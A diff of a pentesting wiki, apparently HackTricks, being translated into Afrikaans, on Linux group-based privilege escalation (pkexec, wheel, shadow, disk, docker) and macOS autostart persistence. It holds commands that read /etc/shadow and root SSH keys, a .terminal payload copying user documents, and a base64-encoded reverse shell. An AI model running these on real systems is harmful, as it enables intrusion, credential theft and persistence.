waarskynlik binaêre lêers uitvoer as sudo deur pkexec te gebruik. +Kyk na die inhoud van: ```bash cat /etc/polkit-1/localauthority.conf.d/* ``` +Daar sal jy vind watter groepe toegelaat word om **pkexec** uit te voer en **standaard** in sommige Linux kan sommige van die groepe **sudo of admin** voorkom. -There you will find which groups are allowed to execute **pkexec** and **by default** in some linux can **appear** some of the groups **sudo or admin**. - -To **become root you can execute**: - +Om **root te word kan jy uitvoer**: ```bash pkexec "/bin/sh" #You will be prompted for your user password ``` - -If you try to execute **pkexec** and you get this **error**: - +As jy probeer om **pkexec** uit te voer en jy kry hierdie **fout**: ```bash polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie ==== AUTHENTICATION FAILED === Error executing command as another user: Not authorized ``` +**Dit is nie omdat jy nie toestemmings het nie, maar omdat jy nie sonder 'n GUI aangesluit is nie**. En daar is 'n oplossing vir hierdie probleem hier: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). Jy benodig **2 verskillende ssh-sessies**: -**It's not because you don't have permissions but because you aren't connected without a GUI**. And there is a work around for this issue here: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903). You need **2 different ssh sessions**: - -{% code title="session1" %} +{% code title="sessie1" %} ```bash echo $$ #Step1: Get current PID pkexec "/bin/bash" #Step 3, execute pkexec #Step 5, if correctly authenticate, you will have a root session ``` -{% endcode %} - -{% code title="session2" %} +{% code title="sessie2" %} ```bash pkttyagent --process #Step 2, attach pkttyagent to session1 #Step 4, you will be asked in this session to authenticate to pkexec ``` {% endcode %} -# Wheel Group - -**Sometimes**, **by default** inside the **/etc/sudoers** file you can find this line: +# Wielgroep +**Soms**, **standaard** binne die **/etc/sudoers** lêer kan jy hierdie lyn vind: ```text %wheel ALL=(ALL:ALL) ALL ``` +Dit beteken dat **enige gebruiker wat behoort tot die groep wheel enigiets as sudo kan uitvoer**. -This means that **any user that belongs to the group wheel can execute anything as sudo**. - -If this is the case, to **become root you can just execute**: - +As dit die geval is, kan jy **root word deur net uit te voer**: ```text sudo su ``` +# Skadugroep -# Shadow Group - -Users from the **group shadow** can **read** the **/etc/shadow** file: - +Gebruikers van die **skadugroep** kan die **/etc/shadow**-lêer **lees**: ```text -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow ``` +So, lees die lêer en probeer om **sommige hashe te kraak**. -So, read the file and try to **crack some hashes**. +# Skyf Groep -# Disk Group - - This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. - -Files:`/dev/sd[a-z][1-9]` +Hierdie voorreg is amper **gelykwaardig aan root-toegang** aangesien jy toegang het tot alle data binne-in die masjien. +Lêers: `/dev/sd[a-z][1-9]` ```text debugfs /dev/sda1 debugfs: cd /root @@ -124,79 +101,68 @@ debugfs: ls debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow ``` - -Note that using debugfs you can also **write files**. For example to copy `/tmp/asd1.txt` to `/tmp/asd2.txt` you can do: - +Let daarop dat jy met behulp van debugfs ook **lêers kan skryf**. Byvoorbeeld, om `/tmp/asd1.txt` na `/tmp/asd2.txt` te kopieer, kan jy die volgende doen: ```bash debugfs -w /dev/sda1 debugfs: dump /tmp/asd1.txt /tmp/asd2.txt ``` +Egter, as jy probeer om lêers wat deur root besit word te skryf (soos `/etc/shadow` of `/etc/passwd`), sal jy 'n "Toestemming geweier" fout kry. -However, if you try to **write files owned by root** \(like `/etc/shadow` or `/etc/passwd`\) you will have a "**Permission denied**" error. - -# Video Group - -Using the command `w` you can find **who is logged on the system** and it will show an output like the following one: +# Video Groep +Met die opdrag `w` kan jy **sien wie op die stelsel aangemeld is** en dit sal 'n uitset soos die volgende een toon: ```bash USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT yossi tty1 22:16 5:13m 0.05s 0.04s -bash moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash ``` +Die **tty1** beteken dat die gebruiker **yossi fisies ingeteken** is op 'n terminaal op die masjien. -The **tty1** means that the user **yossi is logged physically** to a terminal on the machine. - -The **video group** has access to view the screen output. Basically you can observe the the screens. In order to do that you need to **grab the current image on the screen** in raw data and get the resolution that the screen is using. The screen data can be saved in `/dev/fb0` and you could find the resolution of this screen on `/sys/class/graphics/fb0/virtual_size` - +Die **video groep** het toegang om die skermuitset te sien. Jy kan basies die skerms waarneem. Om dit te doen, moet jy die huidige beeld op die skerm in rou data vasvang en die resolusie kry wat die skerm gebruik. Die skerminligting kan gestoor word in `/dev/fb0` en jy kan die resolusie van hierdie skerm vind in `/sys/class/graphics/fb0/virtual_size`. ```bash cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size ``` - -To **open** the **raw image** you can use **GIMP**, select the **`screen.raw`** file and select as file type **Raw image data**: +Om die **rou beeld** oop te maak, kan jy **GIMP** gebruik, kies die **`screen.raw`** lêer en kies as lêertipe **Rou beelddata**: ![](../../.gitbook/assets/image%20%28208%29.png) -Then modify the Width and Height to the ones used on the screen and check different Image Types \(and select the one that shows better the screen\): +Wysig dan die Breedte en Hoogte na die waardes wat op die skerm gebruik word en kyk na verskillende Beeldtipes \(en kies die een wat die skerm beter wys\): ![](../../.gitbook/assets/image%20%28295%29.png) -# Root Group +# Root Groep -It looks like by default **members of root group** could have access to **modify** some **service** configuration files or some **libraries** files or **other interesting things** that could be used to escalate privileges... - -**Check which files root members can modify**: +Dit lyk asof **lede van die root groep** standaard toegang kan hê om sekere **dienskonfigurasie-lêers** of sekere **biblioteeklêers** of **ander interessante dinge** te wysig wat gebruik kan word om voorregte te verhoog... +**Kyk watter lêers root-lede kan wysig**: ```bash find / -group root -perm -g=w 2>/dev/null ``` +# Docker Groep -# Docker Group - -You can mount the root filesystem of the host machine to an instance’s volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine. +Jy kan die wortel lêerstelsel van die gasheer rekenaar aan 'n instansie se volume koppel, sodat wanneer die instansie begin, dit onmiddellik 'n `chroot` in daardie volume laai. Dit gee jou effektief beheer oor die rekenaar. {% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %} {% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %} -# lxc/lxd Group +# lxc/lxd Groep -[lxc - Privilege Escalation](lxd-privilege-escalation.md) +[lxc - Bevoorregte Eskalasie](lxd-privilege-escalation.md)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
- - diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md index e307ab9de..daf1a82b1 100644 --- a/macos-hardening/macos-auto-start-locations.md +++ b/macos-hardening/macos-auto-start-locations.md @@ -1,230 +1,218 @@ -# macOS Auto Start +# macOS Outomatiese Begin
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-This section is heavily based on the blog series [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), the goal is to add **more Autostart Locations** (if possible), indicate **which techniques are still working** nowadays with latest version of macOS (13.4) and to specify the **permissions** needed. +Hierdie afdeling is grootliks gebaseer op die blogreeks [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), die doel is om **meer outomatiese beginplekke** (indien moontlik) by te voeg, aan te dui **watter tegnieke steeds werk** met die nuutste weergawe van macOS (13.4) en om die **toestemmings** wat nodig is, te spesifiseer. -## Sandbox Bypass +## Sandbakkie-omseiling {% hint style="success" %} -Here you can find start locations useful for **sandbox bypass** that allows you to simply execute something by **writing it into a file** and **waiting** for a very **common** **action**, a determined **amount of time** or an **action you can usually perform** from inside a sandbox without needing root permissions. +Hier kan jy beginplekke vind wat nuttig is vir **sandbakkie-omseiling** wat jou in staat stel om eenvoudig iets uit te voer deur dit in 'n lêer te **skryf** en te **wag** vir 'n baie **gewone aksie**, 'n bepaalde **tydperk** of 'n **aksie wat jy gewoonlik binne 'n sandbakkie kan uitvoer** sonder om root-toestemmings nodig te hê. {% endhint %} ### Launchd -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC Bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig vir sandbakkie-omseiling: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Locations +#### Plekke * **`/Library/LaunchAgents`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/Library/LaunchDaemons`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/System/Library/LaunchAgents`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`/System/Library/LaunchDaemons`** - * **Trigger**: Reboot - * Root required +* **Trigger**: Herlaai +* Root vereis * **`~/Library/LaunchAgents`** - * **Trigger**: Relog-in +* **Trigger**: Herlaai * **`~/Library/LaunchDemons`** - * **Trigger**: Relog-in +* **Trigger**: Herlaai -#### Description & Exploitation +#### Beskrywing & Uitbuiting -**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in: +**`launchd`** is die **eerste** **proses** wat deur die OX S-kernel by opstart uitgevoer word en die laaste een wat by afsluiting klaar is. Dit moet altyd die **PID 1** hê. Hierdie proses sal die konfigurasies wat in die **ASEP** **plists** aangedui word, **lees en uitvoer** in: -* `/Library/LaunchAgents`: Per-user agents installed by the admin -* `/Library/LaunchDaemons`: System-wide daemons installed by the admin -* `/System/Library/LaunchAgents`: Per-user agents provided by Apple. -* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple. +* `/Library/LaunchAgents`: Per-gebruiker-agente wat deur die administrateur geïnstalleer is +* `/Library/LaunchDaemons`: Stelselwye daemons wat deur die administrateur geïnstalleer is +* `/System/Library/LaunchAgents`: Per-gebruiker-agente wat deur Apple voorsien word. +* `/System/Library/LaunchDaemons`: Stelselwye daemons wat deur Apple voorsien word. -When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**. - -The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** (as there are services like ssh that needs to be executed before any user access the system). Also agents may use GUI while daemons need to run in the background. +Wanneer 'n gebruiker aanmeld, word die plists wat in `/Users/$USER/Library/LaunchAgents` en `/Users/$USER/Library/LaunchDemons` geleë is, met die **toestemmings van die aangemelde gebruikers** begin. +Die **hoofverskil tussen agente en daemons is dat agente gelaai word wanneer die gebruiker aanmeld en die daemons gelaai word by stelselopstart** (aangesien daar dienste soos ssh is wat uitgevoer moet word voordat enige gebruiker toegang tot die stelsel kry). Agente kan ook GUI gebruik terwyl daemons in die agtergrond moet loop. ```xml - Label - com.apple.someidentifier - ProgramArguments - - bash -c 'touch /tmp/launched' - - RunAtLoad - StartInterval - 800 - KeepAlive - - SuccessfulExit - - +Label +com.apple.someidentifier +ProgramArguments + +bash -c 'touch /tmp/launched' + +RunAtLoad +StartInterval +800 +KeepAlive + +SuccessfulExit + + ``` - -There are cases where an **agent needs to be executed before the user logins**, these are called **PreLoginAgents**. For example, this is useful to provide assistive technology at login. They can be found also in `/Library/LaunchAgents`(see [**here**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) an example). +Daar is gevalle waar 'n agent uitgevoer moet word voordat die gebruiker aanmeld, hierdie word genoem **PreLoginAgents**. Byvoorbeeld, dit is nuttig om ondersteunende tegnologie by aanmelding te voorsien. Hulle kan ook gevind word in `/Library/LaunchAgents` (sien [**hier**](https://github.com/HelmutJ/CocoaSampleCode/tree/master/PreLoginAgents) 'n voorbeeld). {% hint style="info" %} -New Daemons or Agents config files will be **loaded after next reboot or using** `launchctl load ` It's **also possible to load .plist files without that extension** with `launchctl -F ` (however those plist files won't be automatically loaded after reboot).\ -It's also possible to **unload** with `launchctl unload ` (the process pointed by it will be terminated), +Nuwe Daemons of Agents konfigurasie lêers sal **gelaai word na die volgende herlaai of deur gebruik te maak van** `launchctl load ` Dit is **ook moontlik om .plist lêers sonder daardie uitbreiding te laai** met `launchctl -F ` (egter sal daardie plist lêers nie outomaties gelaai word na herlaai nie).\ +Dit is ook moontlik om te **ontlaai** met `launchctl unload ` (die proses wat daardeur aangedui word, sal beëindig word), -To **ensure** that there isn't **anything** (like an override) **preventing** an **Agent** or **Daemon** **from** **running** run: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` +Om te **verseker** dat daar nie **iets** (soos 'n oorskrywing) is wat 'n **Agent** of **Daemon** **verhoed** om **uitgevoer** te word nie, voer uit: `sudo launchctl load -w /System/Library/LaunchDaemos/com.apple.smdb.plist` {% endhint %} -List all the agents and daemons loaded by the current user: - +Lys alle die agente en daemons wat deur die huidige gebruiker gelaai is: ```bash launchctl list ``` - {% hint style="warning" %} -If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks. +As 'n plist deur 'n gebruiker besit word, selfs as dit in 'n daemon-sisteemwye gids is, sal die taak as die gebruiker uitgevoer word en nie as root nie. Dit kan sommige voorregverhogingsaanvalle voorkom. {% endhint %} -### shell startup files +### skulpaart aanvang lêers Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\ Writeup (xterm): [https://theevilbit.github.io/beyond/beyond\_0018/](https://theevilbit.github.io/beyond/beyond\_0018/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC Bypass: [✅](https://emojipedia.org/check-mark-button) - * But you need to find an app with a TCC bypass that executes a shell that loads these files +* Nuttig om sandkas te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [✅](https://emojipedia.org/check-mark-button) +* Maar jy moet 'n toepassing vind met 'n TCC-omseiling wat 'n skulpaart uitvoer wat hierdie lêers laai -#### Locations +#### Plekke * **`~/.zshrc`, `~/.zlogin`, `~/.zshenv.zwc`**, **`~/.zshenv`, `~/.zprofile`** - * **Trigger**: Open a terminal with zsh +* **Trigger**: Maak 'n terminal oop met zsh * **`/etc/zshenv`, `/etc/zprofile`, `/etc/zshrc`, `/etc/zlogin`** - * **Trigger**: Open a terminal with zsh - * Root required +* **Trigger**: Maak 'n terminal oop met zsh +* Root vereis * **`~/.zlogout`** - * **Trigger**: Exit a terminal with zsh +* **Trigger**: Sluit 'n terminal met zsh * **`/etc/zlogout`** - * **Trigger**: Exit a terminal with zsh - * Root required -* Potentially more in: **`man zsh`** +* **Trigger**: Sluit 'n terminal met zsh +* Root vereis +* Moontlik meer in: **`man zsh`** * **`~/.bashrc`** - * **Trigger**: Open a terminal with bash -* `/etc/profile` (didn't work) -* `~/.profile` (didn't work) +* **Trigger**: Maak 'n terminal oop met bash +* `/etc/profile` (het nie gewerk nie) +* `~/.profile` (het nie gewerk nie) * `~/.xinitrc`, `~/.xserverrc`, `/opt/X11/etc/X11/xinit/xinitrc.d/` - * **Trigger**: Expected to trigger with xterm, but it **isn't installed** and even after installed this error is thrown: xterm: `DISPLAY is not set` +* **Trigger**: Verwag om te aktiveer met xterm, maar dit **is nie geïnstalleer nie** en selfs nadat dit geïnstalleer is, word hierdie fout gegooi: xterm: `DISPLAY is not set` -#### Description & Exploitation +#### Beskrywing & Uitbuiting -When initiating a shell environment such as `zsh` or `bash`, **certain startup files are run**. macOS currently uses `/bin/zsh` as the default shell. This shell is automatically accessed when the Terminal application is launched or when a device is accessed via SSH. While `bash` and `sh` are also present in macOS, they need to be explicitly invoked to be used. - -The man page of zsh, which we can read with **`man zsh`** has a long description of the startup files. +Wanneer 'n skulpaart-omgewing soos `zsh` of `bash` geïnisieer word, word **sekere aanvangslêers uitgevoer**. macOS gebruik tans `/bin/zsh` as die verstekskul. Hierdie skul word outomaties geaktiveer wanneer die Terminal-toepassing geopen word of wanneer 'n toestel via SSH benader word. Alhoewel `bash` en `sh` ook teenwoordig is in macOS, moet hulle eksplisiet aangeroep word om gebruik te word. +Die man-bladsy van zsh, wat ons kan lees met **`man zsh`**, het 'n lang beskrywing van die aanvangslêers. ```bash # Example executino via ~/.zshrc echo "touch /tmp/hacktricks" >> ~/.zshrc ``` - -### Re-opened Applications +### Heropende Toepassings {% hint style="danger" %} -Configuring the indicated exploitation and loging-out and loging-in or even rebooting didn't work for me to execute the app. (The app wasn't being executed, maybe it needs to be running when these actions are performed) +Die konfigurasie van die aangeduide uitbuiting en uitlog en weer inlog of selfs herlaai het nie vir my gewerk om die toepassing uit te voer nie. (Die toepassing is nie uitgevoer nie, miskien moet dit aan die gang wees wanneer hierdie aksies uitgevoer word) {% endhint %} **Writeup**: [https://theevilbit.github.io/beyond/beyond\_0021/](https://theevilbit.github.io/beyond/beyond\_0021/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🔴](https://emojipedia.org/large-red-circle) +* Nuttig om sandboks te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [🔴](https://emojipedia.org/large-red-circle) -#### Location +#### Ligging * **`~/Library/Preferences/ByHost/com.apple.loginwindow..plist`** - * **Trigger**: Restart reopening applications +* **Trigger**: Herlaai toepassings na heropstart -#### Description & Exploitation +#### Beskrywing & Uitbuiting -All the applications to reopen are inside the plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` +Al die toepassings wat heropen moet word, is binne die plist `~/Library/Preferences/ByHost/com.apple.loginwindow..plist` -So, make the reopen applications launch your own one, you just need to **add your app to the list**. +Om dus die heropen toepassings jou eie toepassing te laat uitvoer, hoef jy net jou toepassing by die lys te **voeg**. -The UUID can be found listing that directory or with `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` - -To check the applications that will be reopened you can do: +Die UUID kan gevind word deur daardie gids te lys of met `ioreg -rd1 -c IOPlatformExpertDevice | awk -F'"' '/IOPlatformUUID/{print $4}'` +Om die toepassings wat heropen sal word te kontroleer, kan jy die volgende doen: ```bash defaults -currentHost read com.apple.loginwindow TALAppsToRelaunchAtLogin #or plutil -p ~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` - -To **add an application to this list** you can use: - +Om 'n toepassing by hierdie lys te **voeg**, kan jy die volgende gebruik: ```bash # Adding iTerm2 /usr/libexec/PlistBuddy -c "Add :TALAppsToRelaunchAtLogin: dict" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ - -c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ - ~/Library/Preferences/ByHost/com.apple.loginwindow..plist +-c "Set :TALAppsToRelaunchAtLogin:$:BackgroundState 2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:BundleID com.googlecode.iterm2" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Hide 0" \ +-c "Set :TALAppsToRelaunchAtLogin:$:Path /Applications/iTerm.app" \ +~/Library/Preferences/ByHost/com.apple.loginwindow..plist ``` +### Terminal Voorkeure -### Terminal Preferences +* Nuttig om sandbox te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* Terminal gebruik om FDA-toestemmings van die gebruiker te hê -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * Terminal use to have FDA permissions of the user use it - -#### Location +#### Ligging * **`~/Library/Preferences/com.apple.Terminal.plist`** - * **Trigger**: Open Terminal +* **Trigger**: Open Terminal -#### Description & Exploitation +#### Beskrywing & Uitbuiting -In **`~/Library/Preferences`** are store the preferences of the user in the Applications. Some of these preferences can hold a configuration to **execute other applications/scripts**. +In **`~/Library/Preferences`** word die voorkeure van die gebruiker in die Toepassings gestoor. Sommige van hierdie voorkeure kan 'n konfigurasie hê om **ander toepassings/scripts uit te voer**. -For example, the Terminal can execute a command in the Startup: +Byvoorbeeld, die Terminal kan 'n opdrag uitvoer by die Begin:
-This config is reflected in the file **`~/Library/Preferences/com.apple.Terminal.plist`** like this: - +Hierdie konfigurasie word weerspieël in die lêer **`~/Library/Preferences/com.apple.Terminal.plist`** soos volg: ```bash [...] "Window Settings" => { - "Basic" => { - "CommandString" => "touch /tmp/terminal_pwn" - "Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } - "FontAntialias" => 1 - "FontWidthSpacing" => 1.004032258064516 - "name" => "Basic" - "ProfileCurrentVersion" => 2.07 - "RunCommandAsShell" => 0 - "type" => "Window Settings" - } +"Basic" => { +"CommandString" => "touch /tmp/terminal_pwn" +"Font" => {length = 267, bytes = 0x62706c69 73743030 d4010203 04050607 ... 00000000 000000cf } +"FontAntialias" => 1 +"FontWidthSpacing" => 1.004032258064516 +"name" => "Basic" +"ProfileCurrentVersion" => 2.07 +"RunCommandAsShell" => 0 +"type" => "Window Settings" +} [...] ``` +So, as die plist van die voorkeure van die terminal in die stelsel oorgeskryf kan word, kan die **`open`** funksionaliteit gebruik word om die terminal te **open en daardie opdrag uit te voer**. -So, if the plist of the preferences of the terminal in the system could be overwritten, the the **`open`** functionality can be used to **open the terminal and that command will be executed**. - -You can add this from the cli with: +Jy kan dit vanaf die opdraglyn byvoeg met: {% code overflow="wrap" %} ```bash @@ -237,23 +225,22 @@ You can add this from the cli with: ``` {% endcode %} -### Terminal Scripts / Other file extensions +### Terminal Skripte / Ander lêeruitbreidings -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [✅](https://emojipedia.org/check-mark-button) - * Terminal use to have FDA permissions of the user use it +* Nuttig om sanderige omgewing te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC omseiling: [✅](https://emojipedia.org/check-mark-button) +* Terminal gebruik om FDA-toestemmings van die gebruiker te hê -#### Location +#### Plek -* **Anywhere** - * **Trigger**: Open Terminal +* **Enige plek** +* **Trigger**: Open Terminal -#### Description & Exploitation +#### Beskrywing & Uitbuiting -If you create a [**`.terminal`** script](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) and opens, the **Terminal application** will be automatically invoked to execute the commands indicated in there. If the Terminal app has some special privileges (such as TCC), your command will be run with those special privileges. - -Try it with: +As jy 'n [**`.terminal`** skrip](https://stackoverflow.com/questions/32086004/how-to-use-the-default-terminal-settings-when-opening-a-terminal-file-osx) skep en dit oopmaak, sal die **Terminal-toepassing** outomaties geaktiveer word om die opdragte wat daarin aangedui is, uit te voer. As die Terminal-toepassing spesiale voorregte het (soos TCC), sal jou opdrag met daardie spesiale voorregte uitgevoer word. +Probeer dit met: ```bash # Prepare the payload cat > /tmp/test.terminal << EOF @@ -261,16 +248,16 @@ cat > /tmp/test.terminal << EOF - CommandString - mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; - ProfileCurrentVersion - 2.0600000000000001 - RunCommandAsShell - - name - exploit - type - Window Settings +CommandString +mkdir /tmp/Documents; cp -r ~/Documents /tmp/Documents; +ProfileCurrentVersion +2.0600000000000001 +RunCommandAsShell + +name +exploit +type +Window Settings EOF @@ -281,49 +268,48 @@ open /tmp/test.terminal # Use something like the following for a reverse shell: echo -n "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYxOw==" | base64 -d | bash; ``` - -You could also use the extensions **`.command`**, **`.tool`**, with regular shell scripts content and they will be also opened by Terminal. +Jy kan ook die uitbreidings **`.command`** en **`.tool`** gebruik, met gewone skripsinhoud, en dit sal ook deur Terminal geopen word. {% hint style="danger" %} -If terminal has **Full Disk Access** it will be able to complete that action (note that the command executed will be visible in a terminal window). +As die terminal **Volle Disktoegang** het, sal dit in staat wees om daardie aksie te voltooi (let daarop dat die uitgevoerde bevel sigbaar sal wees in 'n terminal-venster). {% endhint %} -### Audio Plugins +### Klankinvoegtoepassings Writeup: [https://theevilbit.github.io/beyond/beyond\_0013/](https://theevilbit.github.io/beyond/beyond\_0013/)\ Writeup: [https://posts.specterops.io/audio-unit-plug-ins-896d3434a882](https://posts.specterops.io/audio-unit-plug-ins-896d3434a882) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * You might get some extra TCC access +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Jy kan dalk ekstra TCC-toegang kry -#### Location +#### Plek * **`/Library/Audio/Plug-Ins/HAL`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar * **`/Library/Audio/Plug-ins/Components`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar * **`~/Library/Audio/Plug-ins/Components`** - * **Trigger**: Restart coreaudiod or the computer +* **Trigger**: Herlaai coreaudiod of die rekenaar * **`/System/Library/Components`** - * Root required - * **Trigger**: Restart coreaudiod or the computer +* Root vereis +* **Trigger**: Herlaai coreaudiod of die rekenaar -#### Description +#### Beskrywing -According to the previous writeups it's possible to **compile some audio plugins** and get them loaded. +Volgens die vorige writeups is dit moontlik om **sekere klankinvoegtoepassings te kompileer** en hulle te laai. -### QuickLook Plugins +### QuickLook-invoegtoepassings Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/) -* Useful to bypass sandbox: [✅](https://emojipedia.org/check-mark-button) -* TCC bypass: [🟠](https://emojipedia.org/large-orange-circle) - * You might get some extra TCC access +* Nuttig om sandput te omseil: [✅](https://emojipedia.org/check-mark-button) +* TCC-omseiling: [🟠](https://emojipedia.org/large-orange-circle) +* Jy kan dalk ekstra TCC-toegang kry -#### Location +#### Plek * `/System/Library/QuickLook` * `/Library/QuickLook` @@ -331,30 +317,29 @@ Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit. * 